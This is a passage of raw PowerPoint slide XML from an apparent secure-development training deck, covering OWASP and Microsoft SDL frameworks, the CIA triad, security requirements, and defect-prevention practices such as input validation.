                  </a:solidFill>
                </a:rPr>
                <a:t>SECURITY</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1099018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9381E2-5B0C-496A-9669-CFB104023D92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Building Security In (Slide 2 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="9" name="Content Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09309170-2364-4D84-80A2-EB794C598E14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="380952826"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="915987" y="1058502"/>
          <a:ext cx="7312026" cy="5461000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3656013">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2481461193"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3656013">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="86301753"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>Standard/Model</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>Description</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="782880848"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>OWASP Software Assurance Maturity Model (SAMM)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>A framework organizations can use to assess, formulate, and implement a strategy for software security. Can be integrated into your existing SDLC.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1382896037"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>OWASP Application Security Verification Standard (ASVS)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>Provides a basis for testing web application technical security controls. Also provides developers with a list of requirements for secure development.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="552702054"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>OWASP Top 10 Proactive Controls 2018</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>Describes the most important controls and control categories that should be included in every application development project.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1256450641"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>OWASP Mobile Security Project</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>A centralized resource to help developers build and maintain secure mobile applications.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="341117564"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>Microsoft Secure Development Lifecycle (SDL)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>A collection of guidance, best practices</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600"/>
                        <a:t>, tools, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0"/>
                        <a:t>and processes to help the developer build security and privacy into all phases of the development process.</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2897926612"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10B071E7-3400-4A71-AB48-0B84CCB78359}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3828912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CIA Triad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Throughout development, ensure that your software provides three aspects of security:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Confidentiality</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—Keep information and communications private and protect them from unauthorized access.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Integrity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—Keep an organization’s information accurate, without error, and without unauthorized modification.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Availability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>—Ensure that systems operate continuously and that authorized users can access the data that they need.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 2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776698">
            <a:off x="6000728" y="3802897"/>
            <a:ext cx="2985663" cy="288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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1424930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FC4EBF-1864-4831-B064-906799C69AA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6C666D6-6740-43F4-978A-3D0E79410B0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1302040"/>
            <a:ext cx="8460150" cy="5327360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make sure that security is part of your requirements-gathering process. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security requirements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensure that software:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Will be tested for security.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Will not be considered finished until security requirements are met.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May be viewed as business requirements:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Bad security can cost the organization in legal expenses, loss of business, disclosure of proprietary data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Are a precursor to identifying functional and non-functional requirements.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security features and attributes should also be identified in functional and non-functional requirements.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Functional requirements:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Specify how the software should function, or behave.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Should include behind-the-scenes functions that users don't </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>necessarily see, such as logging and support for auditing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Non-functional requirements:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Describe quality attributes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May address security-related qualities such as those identified in the CIA Triad.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May drive functional requirements.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Example: Non-functional requirements describing availability may lead you to identify certain functional requirements for backup and redundancy features.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Write security requirements clearly so entire development team can tell when requirements are met.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use a checklist to evaluate your security requirements.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3800890A-F52E-4F8D-817B-33B071A77E68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Business Requirements and Specifications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 2" descr="Image result for checklist clipboard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160" y="3048000"/>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32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Prevent Coding Defects</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Keep your code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>efficient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>readable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> while meeting requirements.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>As you code, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>resist adding new features</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> that were not planned in the design process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Pay attention to feedback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from the code analysis tools provided by the debugging and development environment (lint, warnings, etc.). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compile code using the highest warning level available for your compiler.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Improve the code to eliminate warnings.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>static and dynamic analysis tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to detect and eliminate additional security defects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Extend the tools provided with your development environment with appropriate and effective third-party code analysis tools.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exercise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>care at all input and output points</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (parameters passed in or out, return codes, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Validate input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> provided by all untrusted data sources, including command line arguments, input parameters, environmental variables, URL query strings, web POST data, and user controlled files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Sanitize data and web output</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> you pass to other systems (such as command shells, relational databases, and software components).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A8160BDD-7155-D744-B749-9730458604AD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E301885-B017-46BE-81D1-2B59F3C83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74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60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Evaluating Security Requirements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="Diagram 2"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="354215" y="1143000"/>
          <a:ext cx="8421075" cy="180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Rectangle 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540773" y="3917652"/>
            <a:ext cx="1213867" cy="1605727"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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2" name="Rectangle 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="3917652"/>
            <a:ext cx="1213867" cy="1605727"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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6" name="Rectangle 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4773223" y="3893071"/>
            <a:ext cx="1213867" cy="1605727"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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9" name="Rectangle 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="3922568"/>
            <a:ext cx="1213867" cy="1605727"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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6" name="Rectangle 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7513699" y="3917652"/>
            <a:ext cx="1213867" cy="1605727"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:pr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8" name="TextBox 67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540773" y="3287581"/>
            <a:ext cx="1371600" cy="23774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35560" bIns="40005" numCol="1" spcCol="1270" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="176213" lvl="1" indent="-176213" algn="l" defTabSz="2889250">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" kern="1200" dirty="0"/>
              <a:t>Don’t conflict or contradict each other</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="176213" lvl="1" indent="-176213" defTabSz="2889250">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Work together as a system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="176213" lvl="1" indent="-176213" algn="l" defTabSz="2889250">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" kern="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="TextBox 68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1882915" y="3287581"/>
            <a:ext cx="1371600" cy="23774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35560" bIns="40005" numCol="1" spcCol="1270" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl2pPr marL="176213" lvl="1" indent="-176213" defTabSz="2889250">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buChar char="•"/>
              <a:defRPr sz="1600"/>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each requirement is plain and clear</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can only be interpreted one way</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
